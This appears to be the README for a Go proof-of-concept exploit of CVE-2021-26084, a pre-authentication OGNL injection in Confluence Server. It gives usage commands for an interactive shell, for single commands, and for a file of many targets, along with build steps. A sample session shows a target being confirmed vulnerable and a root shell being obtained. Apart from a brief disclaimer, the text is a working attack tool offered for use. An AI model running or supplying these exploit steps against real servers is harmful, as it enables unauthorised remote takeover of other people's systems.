Proof of concept for CVE-2021-26084.
Confluence Server Webwork OGNL injection (Pre-Auth RCE)
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.
- Double quotations
- Vertical bar
go run exploit.go -t <target> -i
[email protected]:/# go run exploit.go -t http://localhost:8090 -i CVE-2021-26084 - Confluence Server Webwork OGNL injection Made by Tay (https://github.com/taythebot) time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable" time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable" [email protected]:/# whoami root [email protected]:/# exit Exiting interactive mode, goodbye
- Only works on a single target
exitto exit the interactive shell
- Notice shows if possible Windows machine
go run exploit.go -t <target> -c <command>
go run exploit.go -f <file> -c <command>
go mod download go build exploit.go